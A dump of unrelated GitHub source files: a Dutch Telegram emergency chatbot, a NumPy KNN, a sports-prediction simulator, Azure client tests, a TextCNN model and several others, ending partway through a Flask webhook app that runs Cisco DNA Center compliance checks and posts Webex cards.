update['message'][\"chat\"][\"id\"]\r\n return chat_id\r\n\r\n\r\n# haalt message text op\r\ndef get_message_text(update):\r\n message_text = update[\"message\"][\"text\"]\r\n return message_text\r\n\r\n\r\n# haalt de laatste last_update op\r\ndef last_update(req):\r\n response = requests.get(req + \"getUpdates\")\r\n response = response.json()\r\n result = response[\"result\"]\r\n total_updates = len(result) - 1\r\n return 
result[total_updates] # get the last recorded message update\r\n\r\n\r\n# this function sends a message to the user\r\ndef send_message(chat_id, message_text):\r\n    params = {\"chat_id\": chat_id, \"text\": message_text}\r\n    response = requests.post(url + \"sendMessage\", data=params)\r\n    return response\r\n\r\n\r\ndef mainbot():\r\n    update_id = last_update(url)[\"update_id\"]\r\n    geldigelocaties = [\"meldkamer\", \"esso\", \"rotsoord\", \"lidl\", \"kinderopvang\", \"oranjebrug\",\r\n                       \"cafetaria 'Kleyne reick'\", \"mijdrechtstraat\", \"vondelbrug\", \"jutfaseweg\", \"mijdrechtstraat2\",\r\n                       \"roc\", \"grafisch lyceum utrecht\", \"balijelaan\", \"pizzeria toscana\", \"huisartsenpraktijk\",\r\n                       \"croesestraat\"]\r\n\r\n    location = []\r\n    hulp = []\r\n    while True:\r\n        update = last_update(url)\r\n        if update_id == update[\"update_id\"]:\r\n            # /start makes the bot begin\r\n            if get_message_text(update).lower() == \"/start\":\r\n                location.clear()\r\n                hulp.clear()\r\n                send_message(get_chat_id(update), 'Hallo mijn naam is Finn\\nWelke hulp heeft u nodig?\\n'\r\n                                                  'U kunt kiezen uit 1: Politie, 2: Brandweer of 3: Medische hulp')\r\n\r\n            # Checks which kind of assistance the user needs\r\n            elif get_message_text(update).lower() == \"politie\" or get_message_text(update).lower() == \"1\":\r\n                hulp.clear()\r\n                hulp.append(\"politie\")\r\n                send_message(get_chat_id(update), \"U heeft gekozen voor politie.\\nWat is uw locatie?\")\r\n\r\n            elif get_message_text(update).lower() == \"brandweer\" or get_message_text(update).lower() == \"2\":\r\n                hulp.clear()\r\n                hulp.append(\"brandweer\")\r\n                send_message(get_chat_id(update), \"U heeft gekozen voor brandweer.\\nWat is uw locatie?\")\r\n\r\n            elif get_message_text(update).lower() == \"medische hulp\" or get_message_text(update).lower() == \"3\":\r\n                hulp.clear()\r\n                hulp.append(\"medische hulp\")\r\n                send_message(get_chat_id(update), \"U heeft gekozen voor medische hulp.\\nWat is uw locatie?\")\r\n\r\n            # If someone sends a location first, the bot asks for the kind of assistance.\r\n            elif get_message_text(update).lower() in geldigelocaties and len(hulp) == 0:\r\n                send_message(get_chat_id(update), \"Maak eerst een keuze wat voor hulp u wilt.\\n\"\r\n                                                  \"Kies uit 1: politie, 2: brandweer of 3: medische hulp.\\n\"\r\n                                                  \"let op spelling of gebruik de getallen\")\r\n                location.clear()\r\n\r\n            # The user has chosen the assistance and a location\r\n            elif get_message_text(update).lower() in geldigelocaties and len(hulp) != 0:\r\n                location.clear()\r\n                location.append(get_message_text(update).lower())\r\n                send_message(get_chat_id(update), \"De hulp die u nodig heeft is: \"\r\n                                                  + hulp[0] + \"\\nEn uw locatie is: \" + location[0]\r\n                                                  + \"\\nAls dit klopt typ dan: bevestig\")\r\n\r\n            # This ensures that typing 'bevestig' only has effect once both location and assistance have been entered.\r\n            # Writes the given destination to a txt file so that location and assistance can be cleared for\r\n            # the next round.\r\n            elif get_message_text(update).lower() == \"bevestig\":\r\n                if len(geldigelocaties) != 0 and len(hulp) != 0:\r\n                    send_message(get_chat_id(update), \"De \" + hulp[0] + ' is onder weg naar ' + location[0])\r\n                    with open('Locatie.txt', 'w') as bestemming:\r\n                        bestemming.write(location[0])\r\n                    location.clear()\r\n                    hulp.clear()\r\n                    break\r\n\r\n            # Checks whether the location is spelled correctly so the algorithm recognises it.\r\n            elif get_message_text(update).lower() not in geldigelocaties and len(hulp) != 0:\r\n                send_message(get_chat_id(update), \"Dat is geen geldige locatie.\\nProbeer 
een andere en let op spelling.\")\r\n\r\n            # Asks the user to enter a valid kind of assistance.\r\n            else:\r\n                send_message(get_chat_id(update), \"Ik begrijp het niet.\\n\"\r\n                                                  \"Kies uit 1: politie, 2: brandweer of 3: medische hulp.\\n\"\r\n                                                  \"let op spelling of gebruik de getallen\")\r\n\r\n            update_id += 1\r\n","repo_name":"KaiterHorst/IPASS","sub_path":"Chatbot.py","file_name":"Chatbot.py","file_ext":"py","file_size_in_byte":5232,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"13467435957","text":"\"\"\"\nK-Nearest-Neighbour algorithm from scratch (NumPy implementation),\nwhere you can either use 2-loops (inefficient), 1-loop (better)\nor a heavily vectorized zero-loop implementation.\n\nProgrammed by Shivam Chhetry\n* 06-08-2021\n\"\"\"\n\nimport numpy as np\n\nclass KNearestNeighbour:\n    def __init__(self, k):\n        self.k = k\n        self.eps = 1e-6 ## small constant added to keep the distance computation numerically stable\n        \n    def train(self, X, y):\n        self.X_train = X\n        self.Y_train = y\n        \n    def predict(self, X_test, num_loops=2):\n        if num_loops == 0:\n            distances = self.compute_distance_vectorized(X_test)\n        elif num_loops == 1:\n            distances = self.compute_distance_one_loop(X_test)\n        else:\n            distances = self.compute_distance_two_loops(X_test)\n\n        \n        \n        return self.predict_labels(distances)\n    \n    \n    def compute_distance_two_loops(self, X_test):\n        #Naive, inefficient way\n        num_test = X_test.shape[0]\n        num_train = self.X_train.shape[0]\n        distances = np.zeros((num_test, num_train))\n        \n        for i in range(num_test):\n            for j in range(num_train):\n                distances[i,j] = np.sqrt(self.eps + np.sum((X_test[i, :] - self.X_train[j, :])**2))\n        \n        return distances  \n    \n    def compute_distance_one_loop(self, X_test):\n        \"\"\"\n        Much better than two-loops but not as fast as fully vectorized version.\n\n        \"\"\"\n        num_test = X_test.shape[0]\n        num_train = self.X_train.shape[0]\n        distances = np.zeros((num_test, num_train))\n        \n        for i in range(num_test):\n            distances[i,:] = np.sqrt(self.eps + np.sum((self.X_train - X_test[i,:])**2, axis=1))\n        \n        return distances\n    \n    def compute_distance_vectorized(self, X_test):\n        \n        \n        \"\"\"\n        Idea: if we have two vectors a, b (two examples)\n        and for vectors we can compute (a-b)^2 = a^2 - 2a (dot) b + b^2\n        expanding on this and doing so for every vector leads to the \n        heavy vectorized formula for all examples at the same time.\n        \"\"\"\n        \n        \n        #(X_test-X_train)^2 = (X_test^2 - 2*X_test*X_train + X_train^2)\n        \n        X_test_squared = np.sum(X_test**2, axis=1, keepdims=True)\n        X_train_squared = np.sum(self.X_train**2, axis=1, keepdims=True)\n        two_X_test_X_train = np.dot(X_test, self.X_train.T)\n        \n        # (Taking sqrt is not necessary: min distance won't change since sqrt is monotone)\n\n        return np.sqrt(\n            self.eps + X_test_squared -2*two_X_test_X_train + X_train_squared.T\n        )\n        \n        \n    \n    \n    def predict_labels(self, distances):\n        num_test = distances.shape[0]\n        y_pred = np.zeros(num_test)\n        \n        for i in range(num_test):\n            y_indices = np.argsort(distances[i,:])\n            k_closest_classes = self.Y_train[y_indices[:self.k]].astype(int)\n            y_pred[i] = np.argmax(np.bincount(k_closest_classes))\n        \n        return y_pred\n    \n    \nif __name__ == \"__main__\":\n    \n    \"\"\"\n    (X_test-X_train)^2 = (X_test^2 - 2*X_test*X_train + X_train^2)\n    train = np.random.randn(1,4)\n    test = np.random.randn(1,4)\n    num_examples = train.shape[0]\n    \n    KNN.train(train,np.zeros(num_examples))\n    \n    distances = np.sqrt(np.sum(test**2, axis=1, keepdims=True) + np.sum(train**2, axis=1, 
keepdims=True) - 2*np.sum(test*train)) ##keepdims returns (1,1) instead of (1,)\n \n corr_distance = KNN.compute_distance_two_loops(test)\n \n #print(f'The difference is : {np.sqrt(np.sum((corr_distance - distances)**2))}')\n\n\n \"\"\"\n X = np.loadtxt(\"https://raw.githubusercontent.com/aladdinpersson/Machine-Learning-Collection/master/ML/algorithms/knn/example_data/data.txt\", delimiter=',')\n y = np.loadtxt(\"https://raw.githubusercontent.com/aladdinpersson/Machine-Learning-Collection/master/ML/algorithms/knn/example_data/targets.txt\")\n \n KNN = KNearestNeighbour(k=2)\n KNN.train(X, y)\n y_pred = KNN.predict(X, num_loops=1)\n\n \n \n print(f'accuracy: {sum(y_pred==y)/y.shape[0]}')\n \n\n\n\n\n\n\n\n\n\n\n","repo_name":"shivamkc01/MachineLearning_Algorithm__from_scratch","sub_path":"KNN_using_Pytorch_from_scratch.py","file_name":"KNN_using_Pytorch_from_scratch.py","file_ext":"py","file_size_in_byte":4189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73012541695","text":"from hyperopt import fmin, space_eval, tpe\nfrom sklearn.model_selection import StratifiedKFold, cross_val_score\nfrom sklearn.preprocessing import LabelEncoder\n\n\ndef simulate(model, data, season, predictors, output, build=None, evolve=False, freq=1):\n result = output + '_PRED'\n data = data.copy()\n encoder = LabelEncoder().fit(data[output])\n data[output] = encoder.transform(data[output])\n train, test = data[data.SEASON < season].copy(), data[data.SEASON == season].copy()\n\n if build is None:\n build = fit\n\n if evolve:\n test[result] = test[output]\n test_groups = test.groupby('GAME_DATE')\n count = 0\n\n for day in test_groups.groups:\n if count == freq or count == 0:\n build(model, train[predictors], train[output])\n count = 0\n\n games = test_groups.get_group(day)\n test.loc[games.index, [result]] = model.predict(games[predictors])\n train = train.append(games)\n count += 1\n else:\n build(model, train[predictors], train[output])\n test[result] = model.predict(test[predictors])\n\n test[output] = encoder.inverse_transform(test[output])\n test[result] = encoder.inverse_transform(test[result])\n return test\n\n\ndef fit(model, x, y):\n model.fit(x, y)\n\n\nclass HyperOptFit:\n def __init__(\n self, space, max_evals=10, n_splits=10, scoring='roc_auc', random_state=None\n ):\n self.space = space\n self.max_evals = max_evals\n self.n_splits = n_splits\n self.scoring = scoring\n self.random_state = random_state\n\n def fit(self, model, x, y):\n best = fmin(\n lambda params: self.objective(model, params, x, y),\n self.space,\n algo=tpe.suggest,\n max_evals=self.max_evals,\n )\n best_params = space_eval(self.space, best)\n model.set_params(**best_params)\n model.fit(x, y)\n\n def objective(self, model, params, x, y):\n model.set_params(**params)\n cv = StratifiedKFold(n_splits=self.n_splits, random_state=self.random_state)\n score = cross_val_score(model, x, y, cv=cv, scoring=self.scoring)\n return 1 - score.mean()\n","repo_name":"klane/databall","sub_path":"databall/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"79"} +{"seq_id":"21595889745","text":"import random\nfrom unittest.mock import patch\n\nfrom azure.identity import ClientSecretCredential\nfrom azure.mgmt.costmanagement import CostManagementClient\nfrom azure.mgmt.resource import ResourceManagementClient\nfrom azure.mgmt.storage import 
StorageManagementClient\nfrom azure.storage.blob import BlobServiceClient\nfrom django.test import TestCase\nfrom faker import Faker\n\nfrom providers.azure.client import AzureClientFactory\n\nFAKE = Faker()\n\n\nclass AzureClientFactoryTestCase(TestCase):\n \"\"\"Parent Class for AzureClientFactory test cases.\"\"\"\n\n def setUp(self):\n \"\"\"Test case setup.\"\"\"\n self.clouds = [\"china\", \"germany\", \"public\", \"usgov\"]\n\n @patch(\"providers.azure.client.ClientSecretCredential.get_token\")\n def test_constructor(self, mock_get_token):\n \"\"\"Test that we can create an AzureClientFactory object.\"\"\"\n obj = AzureClientFactory(\n subscription_id=FAKE.uuid4(),\n tenant_id=FAKE.uuid4(),\n client_id=FAKE.uuid4(),\n client_secret=FAKE.word(),\n cloud=random.choice(self.clouds),\n )\n self.assertTrue(isinstance(obj, AzureClientFactory))\n\n @patch(\"providers.azure.client.ClientSecretCredential.get_token\")\n def test_costmanagement_client(self, mock_get_token):\n \"\"\"Test the costmanagement_client property.\"\"\"\n obj = AzureClientFactory(\n subscription_id=FAKE.uuid4(),\n tenant_id=FAKE.uuid4(),\n client_id=FAKE.uuid4(),\n client_secret=FAKE.word(),\n cloud=random.choice(self.clouds),\n )\n self.assertTrue(isinstance(obj.cost_management_client, CostManagementClient))\n\n @patch(\"providers.azure.client.ClientSecretCredential.get_token\")\n def test_credentials(self, mock_get_token):\n \"\"\"Test the credentials property.\"\"\"\n obj = AzureClientFactory(\n subscription_id=FAKE.uuid4(),\n tenant_id=FAKE.uuid4(),\n client_id=FAKE.uuid4(),\n client_secret=FAKE.word(),\n cloud=random.choice(self.clouds),\n )\n self.assertTrue(isinstance(obj._credentials, ClientSecretCredential))\n\n @patch(\"providers.azure.client.ClientSecretCredential.get_token\")\n def test_resource_client(self, mock_get_token):\n \"\"\"Test the resource_client property.\"\"\"\n obj = AzureClientFactory(\n subscription_id=FAKE.uuid4(),\n tenant_id=FAKE.uuid4(),\n client_id=FAKE.uuid4(),\n client_secret=FAKE.word(),\n cloud=random.choice(self.clouds),\n )\n self.assertTrue(isinstance(obj.resource_client, ResourceManagementClient))\n\n @patch(\"providers.azure.client.ClientSecretCredential.get_token\")\n def test_storage_client(self, mock_get_token):\n \"\"\"Test the storage_client property.\"\"\"\n obj = AzureClientFactory(\n subscription_id=FAKE.uuid4(),\n tenant_id=FAKE.uuid4(),\n client_id=FAKE.uuid4(),\n client_secret=FAKE.word(),\n cloud=random.choice(self.clouds),\n )\n self.assertTrue(isinstance(obj.storage_client, StorageManagementClient))\n\n @patch(\"providers.azure.client.ClientSecretCredential.get_token\")\n def test_subscription_id(self, mock_get_token):\n \"\"\"Test the subscription_id property.\"\"\"\n subscription_id = FAKE.uuid4()\n obj = AzureClientFactory(\n subscription_id=subscription_id,\n tenant_id=FAKE.uuid4(),\n client_id=FAKE.uuid4(),\n client_secret=FAKE.word(),\n cloud=random.choice(self.clouds),\n )\n self.assertTrue(obj.subscription_id, subscription_id)\n\n @patch(\"providers.azure.client.ClientSecretCredential.get_token\")\n def test_cloud_storage_account(self, mock_get_token):\n \"\"\"Test the cloud_storage_account method.\"\"\"\n subscription_id = FAKE.uuid4()\n resource_group_name = FAKE.word()\n storage_account_name = FAKE.word()\n obj = AzureClientFactory(\n subscription_id=subscription_id,\n tenant_id=FAKE.uuid4(),\n client_id=FAKE.uuid4(),\n client_secret=FAKE.word(),\n cloud=random.choice(self.clouds),\n )\n with patch.object(StorageManagementClient, \"storage_accounts\", 
return_value=None):\n cloud_account = obj.cloud_storage_account(resource_group_name, storage_account_name)\n self.assertTrue(isinstance(cloud_account, BlobServiceClient))\n\n @patch(\"providers.azure.client.ClientSecretCredential.get_token\")\n def test_scope_and_export_name(self, mock_get_token):\n \"\"\"Test the scope and export_name properties.\"\"\"\n subscription_id = FAKE.uuid4()\n scope = f\"/subscriptions/{subscription_id}\"\n export_name = \"cost_export\"\n obj = AzureClientFactory(\n subscription_id=subscription_id,\n tenant_id=FAKE.uuid4(),\n client_id=FAKE.uuid4(),\n client_secret=FAKE.word(),\n cloud=random.choice(self.clouds),\n scope=scope,\n export_name=export_name,\n )\n self.assertTrue(obj.scope, scope)\n self.assertTrue(obj.export_name, export_name)\n","repo_name":"project-koku/koku","sub_path":"koku/providers/test/azure/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":5195,"program_lang":"python","lang":"en","doc_type":"code","stars":238,"dataset":"github-code","pt":"79"} +{"seq_id":"1533382856","text":"\nfrom pyspark.sql import SparkSession\nfrom metrics.before import DeltaTableMetricsCollectorBefore\nfrom configure_logging import LoggingConfigurator\n\nif __name__ == \"__main__\":\n # Configure logging settings\n logger = LoggingConfigurator()\n logger.configure_logging()\n\n # Initialize SparkSession for the DeltaTableMetricsCollectorBefore\n spark = SparkSession.builder.appName(\"DeltaTableMetricsCollectorBefore\").getOrCreate()\n \n config_file_path = \"config/param.json\"\n\n # Create an instance of DeltaTableMetricsCollectorBefore and execute the metric collection\n collector = DeltaTableMetricsCollectorBefore(spark,config_file_path)\n collector.collect_metrics()\n","repo_name":"douglasjr1985/databricks_workflow","sub_path":"source/deltacleaner/RunJobBefore.py","file_name":"RunJobBefore.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1697906026","text":"#!usr/bin/env python\n# coding:utf-8\n# @time :2019/10/30 10:51\n# @author :liteng\n# @function :tensorflow2.0 for textcnn\n# @paper: Convolutional Neural Networks for Sentence Classification\n\n\nimport tensorflow as tf\nfrom tensorflow import keras\n\nfrom model.layers.embeddings import EmbeddingsLayer\n\n\nclass Model(tf.keras.Model):\n def __init__(self, config):\n super(Model, self).__init__()\n self.config = config\n if self.config.embedding.use_embedding:\n self.embedding = EmbeddingsLayer(config.embedding)\n self.reshape = keras.layers.Reshape((config.input_length, config.embedding.hidden_size, 1))\n self.embedding_size = config.embedding.hidden_size\n else:\n self.reshape = keras.layers.Reshape((config.input_length, config.TextCNN.embedding_dimension, 1))\n self.embedding_size = config.TextCNN.embedding_dimension\n #keras.layers.Embedding(config.TextCNN.input_dim, config.TextCNN.embedding_dimension,\n # input_length=config.TextCNN.input_length)\n\n\n self.kernel_sizes = config.TextCNN.kernel_sizes\n self.convs = []\n self.pools = []\n\n for kernel_size in self.kernel_sizes:\n conv = keras.layers.Conv2D(filters=64, kernel_size=(kernel_size, self.embedding_size),\n strides=1, padding='valid', activation='relu')\n self.convs.append(conv)\n pool = keras.layers.MaxPool2D(pool_size=(config.input_length - kernel_size + 1, 1), padding='valid')\n self.pools.append(pool)\n\n #self.top_k = self.config.TextCNN.top_k_max_pooling\n self.flatten = keras.layers.Flatten()\n self.fc = 
keras.layers.Dense(config.num_classes)\n\n def call(self, inputs,training=None, mask=None):\n print(\"inputs\", inputs)\n x = inputs\n if self.config.embedding.use_embedding:\n x = self.embedding(x)\n print(\"embedding\", x)\n x = self.reshape(x)\n print(\"reshape \", x)\n cnns = []\n for i in range(len(self.convs)):\n conv = self.convs[i](x)\n pool = self.pools[i](conv)\n cnns.append(pool)\n print(\"conv %d\"%i, conv)\n print(\"pool %d\"%i, pool)\n\n x = keras.layers.concatenate(cnns)\n print(\"concat\", x)\n x = self.flatten(x)\n print(\"flatten \", x)\n x = self.fc(x)\n if self.config.logits_type == \"softmax\":\n x = tf.nn.softmax(x)\n elif self.config.logits_type == \"sigmoid\":\n x = tf.nn.sigmoid(x)\n print(\"output \", x)\n return x","repo_name":"xgdlt/text_classification_tf","sub_path":"model/classification/textcnn.py","file_name":"textcnn.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"28638906833","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: Jeffrey Gao\n# Time: 2020/6/29 22:06\n# Description: 读取配置\n\n\nimport yaml\n\n\nINITIALS_FILE = 'pinyin/initials.yml'\nFINALS_FILE = 'pinyin/finals.yml'\n\n\nclass Config(object):\n\n def __init__(self):\n self.initials_dict = self.load_pinyin_config(INITIALS_FILE)\n self.finals_dict = self.load_pinyin_config(FINALS_FILE)\n\n @staticmethod\n def load_pinyin_config(file):\n \"\"\"\n 加载拼音的配置文件\n :param file:\n :return:\n \"\"\"\n return yaml.safe_load(open(file, 'r', encoding='utf-8'))\n\n\nconfig_basic = Config()\n","repo_name":"gcbanana/find_confused_words","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"12533234016","text":"'''\nGiven an integer array nums and an integer k, return the k most frequent elements. 
You may return the answer in any order.\n'''\n\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n from collections import Counter\n ans = []\n counts = Counter(nums)\n return [ele[0] for ele in counts.most_common(k)]\n","repo_name":"atharvamm/programming_notes","sub_path":"python/prac/leetcode/347.py","file_name":"347.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42757207835","text":"__author__ = \"Gabriel Zapodeanu TME, ENB\"\n__email__ = \"gzapodea@cisco.com\"\n__version__ = \"0.1.0\"\n__copyright__ = \"Copyright (c) 2021 Cisco and/or its affiliates.\"\n__license__ = \"Cisco Sample Code License, Version 1.1\"\n\n\nimport os\nimport time\nimport urllib3\nimport json\nimport difflib\nimport webex_apis\nimport yaml\nimport logging\n\nfrom flask import Flask, request, send_from_directory\nfrom flask_basicauth import BasicAuth\nfrom requests.auth import HTTPBasicAuth # for Basic Auth\nfrom urllib3.exceptions import InsecureRequestWarning # for insecure https warnings\nfrom dotenv import load_dotenv\nfrom dnacentersdk import DNACenterAPI\n\nurllib3.disable_warnings(InsecureRequestWarning) # disable insecure https warnings\n\nload_dotenv('environment.env')\n\nWEBHOOK_USERNAME = os.getenv('WEBHOOK_USERNAME')\nWEBHOOK_PASSWORD = os.getenv('WEBHOOK_PASSWORD')\n\nDNAC_URL = os.getenv('DNAC_URL')\nDNAC_USER = os.getenv('DNAC_USER')\nDNAC_PASS = os.getenv('DNAC_PASS')\n\nWEBEX_BOT_AUTH = os.getenv('WEBHOOKD_BOT_AUTH')\nWEBEX_URL = os.getenv('WEBEX_URL')\nWEBEX_ROOM = os.getenv('WEBHOOKD_ROOM')\n\nos.environ['TZ'] = 'America/Los_Angeles' # define the timezone for PST\ntime.tzset() # adjust the timezone, more info https://help.pythonanywhere.com/pages/SettingTheTimezone/\n\napp = Flask(__name__)\n\napp.config['BASIC_AUTH_USERNAME'] = WEBHOOK_USERNAME\napp.config['BASIC_AUTH_PASSWORD'] = WEBHOOK_PASSWORD\n# app.config['BASIC_AUTH_FORCE'] = True # enable if all API endpoints support HTTP basic auth\n\nbasic_auth = BasicAuth(app)\n\nDNAC_AUTH = HTTPBasicAuth(DNAC_USER, DNAC_PASS)\n\n\ndef pprint(json_data):\n \"\"\"\n Pretty print JSON formatted data\n :param json_data: data to pretty print\n :return None\n \"\"\"\n print(json.dumps(json_data, indent=4, separators=(' , ', ' : ')))\n\n\ndef time_sleep(time_sec):\n \"\"\"\n This function will wait for the specified time_sec, while printing a progress bar, one '!' / second\n Sample Output :\n Wait for 10 seconds\n !!!!!!!!!!\n :param time_sec: time, in seconds\n :return: none\n \"\"\"\n print('\\nWait for ' + str(time_sec) + ' seconds')\n for i in range(time_sec):\n print('!', end='')\n time.sleep(1)\n return\n\n\ndef compare_configs(cfg1, cfg2):\n \"\"\"\n This function, using the unified diff function, will compare two config files and identify the changes.\n '+' or '-' will be prepended in front of the lines with changes\n :param cfg1: old configuration file path and filename\n :param cfg2: new configuration file path and filename\n :return: text with the configuration lines that changed. 
The return will include the configuration for the sections\n that include the changes\n \"\"\"\n\n # open the old and new configuration files\n f1 = open(cfg1, 'r')\n old_cfg = f1.readlines()\n f1.close()\n\n f2 = open(cfg2, 'r')\n new_cfg = f2.readlines()\n f2.close()\n\n # compare the two specified config files {cfg1} and {cfg2}\n d = difflib.unified_diff(old_cfg, new_cfg, n=9)\n\n # create a diff_list that will include all the lines that changed\n # create a diff_output string that will collect the generator output from the unified_diff function\n diff_list = []\n diff_output = ''\n\n for line in d:\n diff_output += line\n if line.find('xxxx') == -1:\n if line.find('quit') == -1:\n if (line.find('+++') == -1) and (line.find('---') == -1):\n if (line.find('-!') == -1) and (line.find('+!') == -1):\n if line.startswith('+'):\n diff_list.append('\\n' + line)\n elif line.startswith('-'):\n diff_list.append('\\n' + line)\n\n # process the diff_output to select only the sections between '!' characters for the sections that changed,\n # replace the empty '+' or '-' lines with space\n diff_output = diff_output.replace('+!', '!')\n diff_output = diff_output.replace('-!', '!')\n diff_output_list = diff_output.split('!')\n\n all_changes = []\n\n for changes in diff_list:\n for config_changes in diff_output_list:\n if changes in config_changes:\n if config_changes not in all_changes:\n all_changes.append(config_changes)\n\n # create a config_text string with all the sections that include changes\n config_text = ''\n for items in all_changes:\n config_text += items\n\n return config_text\n\n\n@app.route('/') # create a decorator for testing the Flask framework\n@basic_auth.required\ndef index():\n return '
Flask Receiver App is Up!
', 200\n\n\n@app.route('/compliance_check', methods=['POST']) # API endpoint to receive the compliance event notifications\n@basic_auth.required\ndef compliance_check():\n\n # logging, debug level, to file {application_run.log}\n logging.basicConfig(\n filename='application_run.log',\n level=logging.DEBUG,\n format='%(asctime)s.%(msecs)03d %(levelname)s %(module)s - %(funcName)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n if request.method == 'POST':\n print('Webhook Received')\n webhook_json = request.json\n\n # save to a file, create new file if not existing, append to existing file\n with open('compliance_check_data.log', 'a') as filehandle:\n filehandle.write('%s\\n' % json.dumps(webhook_json))\n\n # print the received notification\n print('Payload: ')\n print(webhook_json, '\\n')\n\n # check if a new open issue, ignore if an resolved issue notification\n issue_status = webhook_json['details']['Assurance Issue Status']\n if issue_status == 'resolved':\n return 'Notification Received', 202\n\n # identify the Cisco DNA Center reporting the issue\n dnac_ip = webhook_json['dnacIP']\n dnac_url = 'https://' + dnac_ip\n\n # create a DNACenterAPI \"Connection Object\"\n dnac_api = DNACenterAPI(username=DNAC_USER, password=DNAC_PASS, base_url=dnac_url, version='2.2.2.3', verify=False)\n\n # identify what type of event notification was received\n event_id = webhook_json['eventId']\n print('\\nEvent Id:', event_id)\n\n # identify the event details\n event_details = webhook_json['details']['Assurance Issue Details']\n print('Event Details:', event_details)\n print('Cisco DNA Center Reporting the issue:', dnac_ip)\n event_link = webhook_json['ciscoDnaEventLink']\n\n # parse the payload for the event, and select device info\n device_management_ip = webhook_json['details']['Device']\n print('Device Management IP Address:', device_management_ip)\n device_info = dnac_api.devices.get_network_device_by_ip(ip_address=device_management_ip)\n device_hostname = device_info['response']['hostname']\n print('Device Hostname:', device_hostname)\n device_id = device_info['response']['id']\n print('Device Id:', device_id)\n\n # post message to Webex Room\n room_id = webex_apis.get_room_id(WEBEX_ROOM)\n\n card_message = {\n \"roomId\": room_id,\n \"parentId\": None,\n \"markdown\": \"Cisco DNA Center Notification\",\n \"attachments\": [\n {\n \"contentType\": \"application/vnd.microsoft.card.adaptive\",\n \"content\": {\n \"$schema\": \"http://adaptivecards.io/schemas/adaptive-card.json\",\n \"type\": \"AdaptiveCard\",\n \"version\": \"1.0\",\n \"body\": [\n {\n \"type\": \"TextBlock\",\n \"text\": \"Cisco DNA Center Notification\",\n \"weight\": \"bolder\",\n \"size\": \"large\"\n },\n {\n \"type\": \"FactSet\",\n \"facts\": [\n {\n \"title\": \"Assurance Issue Details:\",\n \"value\": event_details\n },\n {\n \"title\": \"Device Hostname:\",\n \"value\": device_hostname\n },\n {\n \"title\": \"Device Management IP:\",\n \"value\": device_management_ip\n },\n {\n \"title\": \"Cisco DNA Center IP\",\n \"value\": dnac_ip\n }\n ]\n }\n ],\n \"actions\": [\n {\n \"type\": \"Action.openURL\",\n \"title\": \"Cisco DNA Center Issue Details\",\n \"url\": event_link\n }\n ]\n }\n }\n ]\n }\n\n response = webex_apis.post_room_card_message(WEBEX_ROOM, card_message)\n response_json = response.json()\n message_id = response_json['id']\n\n print('\\nCisco DNA Center notification message posted')\n\n # collect device detail info\n device_detail_response = dnac_api.devices.get_device_detail(identifier='uuid', 
search_by=device_id)\n device_detail_json = device_detail_response['response']\n device_sn = device_detail_json['serialNumber']\n device_os_version = device_detail_json['softwareVersion']\n device_family = device_detail_json['platformId']\n device_location = device_detail_json['location']\n\n print('\\nDevice Family:', device_family)\n print('Device OS Version:', device_os_version)\n print('Device Serial Number:', device_sn)\n print('Device Location:', device_location)\n\n time.sleep(1)\n card_message = {\n \"roomId\": room_id,\n \"parentId\": message_id,\n \"markdown\": \"Device Details\",\n \"attachments\": [\n {\n \"contentType\": \"application/vnd.microsoft.card.adaptive\",\n \"content\": {\n \"$schema\": \"http://adaptivecards.io/schemas/adaptive-card.json\",\n \"type\": \"AdaptiveCard\",\n \"version\": \"1.0\",\n \"body\": [\n {\n \"type\": \"TextBlock\",\n \"text\": \"Cisco DNA Center Device Details\",\n \"weight\": \"bolder\"\n },\n {\n \"type\": \"FactSet\",\n \"facts\": [\n {\n \"title\": \"Family:\",\n \"value\": device_family\n },\n {\n \"title\": \"Serial Number:\",\n \"value\": device_sn\n },\n {\n \"title\": \"OS Version:\",\n \"value\": device_os_version\n },\n {\n \"title\": \"Location\",\n \"value\": device_location\n }\n ]\n },\n {\n \"type\": \"TextBlock\",\n \"wrap\": True,\n \"text\": \"Collecting Compliance information, this will take few minutes\"\n }\n ],\n \"actions\": [\n {\n \"type\": \"Action.openURL\",\n \"title\": \"Device 360 View\",\n \"url\": 'https://10.93.141.45/dna/assurance/device/details?id=' + device_id\n }\n ]\n }\n }\n ]\n }\n\n response = webex_apis.post_room_card_message(WEBEX_ROOM, card_message)\n\n print('\\nDevice Details message posted\\nWait for Config Compliance timer')\n time_sleep(180)\n\n # re-sync device\n resync = dnac_api.devices.sync_devices_using_forcesync(force_sync=True, payload=[device_id])\n print('\\n\\nDevice re-sync started, wait for re-sync to complete')\n time_sleep(180)\n\n # check compliance\n run_compliance = dnac_api.compliance.run_compliance(deviceUuids=[device_id])\n compliance_task_id = run_compliance['response']['taskId']\n print('\\n\\nCompliance Task Id:', compliance_task_id)\n\n # wait for 30 seconds for compliance checks to complete\n time_sleep(30)\n\n # check task by id\n task_info = dnac_api.task.get_task_by_id(task_id=compliance_task_id)\n task_result = task_info['response']['progress']\n print('\\n\\nCompliance check status:', task_result)\n\n # retrieve the compliance status\n compliance_info = dnac_api.compliance.compliance_details_of_device(device_uuid=device_id)\n compliance_info_json = compliance_info['response']\n compliance_status = {}\n facts = [] # to be used for the adaptive cards message\n for check in compliance_info_json:\n print('Compliance Type:', check['complianceType'], ', Status:', check['status'])\n compliance_status.update({check['complianceType']: check['status']})\n facts.append({'title': check['complianceType'], 'value': check['status']})\n\n # update Webex room 